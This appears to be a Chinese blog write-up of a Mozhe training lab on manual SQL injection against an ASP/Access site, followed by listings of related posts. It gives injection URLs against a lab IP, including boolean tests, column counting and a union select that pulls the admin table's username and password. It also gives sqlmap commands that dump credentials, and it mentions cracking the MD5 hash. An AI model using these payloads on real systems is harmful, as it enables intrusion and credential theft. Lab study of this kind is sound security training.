SQL手工注入漏洞测试(Access数据库)

最新推荐文章于 2023-12-06 23:01:34 发布
最新推荐文章于 2023-12-06 23:01:34 发布
阅读量597 收藏 1
点赞数
分类专栏: WEB安全-SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441315/article/details/119211703
版权

SQL手工注入漏洞测试-Access数据库

背景介绍

墨者
安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解Access的数据结构;
4.了解字符串的MD5加解密;

解题方向

手工进行SQL注入测试,获取管理密码登录。

判断注入点

http://219.153.49.228:48466/new_list.asp?id=1%20and%201=2

http://219.153.49.228:48466/new_list.asp?id=1%20and%201=1

在这里插入图片描述

猜字段

http://219.153.49.228:48466/new_list.asp?id=1%20order%20by%205

在这里插入图片描述
字段数为4

猜测表名为admin,列名为username,passwd

http://219.153.49.228:48466/new_list.asp?id=-1%20union%20select%201,username,passwd,4%20from%20admin

在这里插入图片描述
得到密码拿去登录发现不对,再拿密码去md5解密登录
在这里插入图片描述

利用工具爆破

sqlmap.py -u http://219.153.49.228:48466/new_list.asp?id=1  -tables

sqlmap.py -u http://219.153.49.228:48466/new_list.asp?id=1  -columns -T admin

sqlmap.py -u http://219.153.49.228:48466/new_list.asp?id=1 --dump -T admin -C "passwd,username"
硫酸超
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院 - SQL手工注入漏洞测试(Access数据库)
多崎巡礼的博客
07-26 945
进入公告找到注入点 地址输入 and 1=1 =1正常,and 1=2 出现报错说明有注入点。 3.猜测存在的表,and exists (select * from admin),我这里凭借着经验猜出来是admin表,如果不是的话可以继续猜,格式为:and exists (select * from 表名),运行不报错,说明就是存在这个admin表了。 4.猜测这个表里面有哪些字段:order ...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
SQL手工注入漏洞(Access数据库)
weixin_47493074的博客
09-19 124
SQL手工注入漏洞
SQL手工注入漏洞测试(Access数据库)-墨者
weoptions的博客
12-06 772
———靶场专栏———分享我的打靶过程
墨者靶场-SQL手工注入漏洞测试(Access数据库)
Sa1nZen的博客
08-26 241
墨者靶场-SQL手工注入漏洞测试(Access数据库)
墨者学院02 SQL手工注入漏洞测试(Access数据库)
weixin_42789937的博客
01-24 309
墨者学院02 SQL手工注入漏洞测试(Access数据库),是一个较为详细的WP~
0x05.SQL手工注入漏洞测试(Access数据库)
qq_31679787的博客
09-12 130
点击通知栏,出现注入页面; 直接使用sqlmap,和mysql不同的是access直接猜表名; 跑出了两个表名,先结束,尝试admin表; 跑列名; 得到列名; 爆账号密码; md5解密; 登录后得到key; ...
SQL手工注入漏洞测试(MySQL数据库)
weixin_54227009的博客
12-15 948
SQL手工注入
墨者学院-SQL手工注入漏洞测试(Access数据库)
JohnReese01的博客
01-26 271
1.判断是否存在注入点 在?id=1的结尾添加and 1=1和 and 1=2检测是否存在注入,结果为正常和错误,经验证存在注入点; 2.猜解表名 (因为Access用联合语句显示可显字段时,必须要“from 表名”,所以需要先猜表名。) 在?id=1结尾添加语句:and exists(select * from admin)  若存在表名为admin的表,则页面正常显示。 3.猜解列名 ...
SQL手工注入漏洞测试-MongoDB数据库注入-Access数据库注入-PostgreSQL数据库注入-Sql Server数据库注入-Oracle数据库注入
rumil的博客
08-15 252
SQL注入手工测试: MongoDB数据库注入-Access数据库注入-PostgreSQL数据库注入-Sql Server数据库注入-Oracle数据库注入
SQL注入Access注入手工
12-14
SQL注入是一种常见的网络安全威胁,主要针对使用SQL语言的数据库系统,如AccessSQL Server。当一个Web应用程序未能充分验证用户输入的数据,攻击者可以利用这一漏洞,在查询语句的末尾添加恶意的SQL代码,从而在...
手工注入常用SQL语句.txt
07-18
这些知识点主要涉及不同的数据库类型(如Access、MSSQL、MySQL)及其相应的手工注入技巧。以下是对这些知识点的详细解析: ### 1. 手工SQL注入基础概念 在进行手工SQL注入之前,我们需要了解SQL注入的基本原理。...
手工注入教程 sql数据库注入
10-31
通过上述介绍,我们可以看到,手工SQL注入虽然需要一定的技巧和经验,但掌握了基本的方法和流程后,就可以有效地发现并利用SQL注入漏洞。值得注意的是,这种技能应当仅用于合法的安全测试和渗透测试活动中,不得用于...
基于Springboot和Vue的图书借还管理系统源码 图书借还管理系统代码(高分毕设)
07-28
图书借还管理系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
C语言内存管理:静态与动态分配的较量
07-28
C语言是一种通用的编程语言,由丹尼斯·里奇(Dennis Ritchie)在20世纪70年代早期于美国电话电报公司(AT&T)的贝尔实验室开发。C语言以其高效性、灵活性和可移植性而闻名,它是一种过程式编程语言,提供了对底层硬件的直接访问能力。 C语言的特点包括: 1. **简洁高效**:C语言的语法简洁,执行效率高,适合编写系统软件。 2. **接近硬件**:C语言提供了对内存地址和位操作的直接控制,使其非常适合硬件级编程。 3. **可移植性**:C语言编写的程序可以在不同的操作系统和硬件平台上编译和运行,具有很好的可移植性。 4. **丰富的库支持**:C语言拥有大量的标准库,如标准输入输出库(stdio.h)、数学库(math.h)等。 5. **结构化编程**:C语言支持结构化编程,允许使用循环、条件判断和函数等控制结构。 6. **指针**:C语言的指针功能强大,可以操作内存地址,实现复杂的数据结构和算法。 7. **编译型语言**:C语言是一种编译型语言,源代码需要通过编译器转换成机器码才能运行。 C语言广泛应用于操作系统(如Unix和Linux)、嵌入式系统、高性能
通讯协议规范-命令包格式
07-28
提供一份通讯协议规范,包含命令包、格式等,在上下位机调试的时候可参考该文档,制定对应的通讯协议。
四足宠物机器狗动态步行规划与仿真.pdf
最新发布
07-28
四足宠物机器狗动态步行规划与仿真
sql手工注入漏洞测试(mysql数据库)
06-28
SQL手工注入漏洞测试是一种常见的安全测试方法,主要针对MySQL数据库。通过手动输入恶意代码,测试系统是否存在SQL注入漏洞,以此来发现和修复系统的安全漏洞。这种测试方法需要有一定的技术水平和经验,同时也需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值